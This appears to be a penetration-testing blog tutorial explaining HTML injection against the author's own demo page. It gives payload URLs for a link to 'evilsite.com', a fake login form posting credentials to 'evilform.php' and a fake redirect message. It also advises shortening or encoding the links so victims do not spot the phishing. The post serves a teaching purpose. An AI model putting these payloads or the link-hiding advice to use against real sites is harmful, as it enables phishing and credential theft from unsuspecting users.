WebApp Pentesting:What is HTML Injection

Hi Everyone 

So In this post we will talk about HTML injection.

HTML injection is similar to Cross Site Scripting (XSS) attack. But in XSS we insert malicious Script Tags to run JavaScript but in HTML injection we use HTML tag in order to modify the page for malicious purposes.

Why HTML injection Happens ?

When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.

So to demonstrate this I have hosted a vulnerable webpage on http://htmli.comlu.com/html.php
When you visit to this page you can see that on that webpage it says
Hi Mr  Thanks for looking here
Now you can give a parameter to this by just adding ?name=ANY_HTML_VAlue so the final url will be

lets try to exploit it.

here first we will put some content in <b> tag
use this url and you can see that some text is in dark black http://htmli.comlu.com/html.php?name=<b>html-injection</b>

Redirecting user to malicious site 

http://htmli.comlu.com/html.php?name=<a href="evilsite.com">Click here to login</a>

Creating a Fake login form

http://htmli.comlu.com/html.php?name=<form action="evilform.php" method="post"><input type="text" name="user" placeholder="username"></br><input type="password" name="pass" placeholder="pass"><!--
I used comment tag in the last of the form so all other content of the form will be commented out and that will not be displayed on the page.

Displaying a Fake Message

To display a fake message you can use this http://htmli.comlu.com/html.php?name=<p>we have changed our website login page please go to evilsite.com for login</p>

So the question is if we send this url to a use he will get to know that we are doing an phishing attack on him.
So you can encode the url or you can shorten the url using any of the url short service like goo.gl

Thats All for this post 
Hope you enjoyed it.

Suggestion are welcome. Please do comment below for your feedback.

Jitendra Kumar Singh(Team Computer Korner)
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!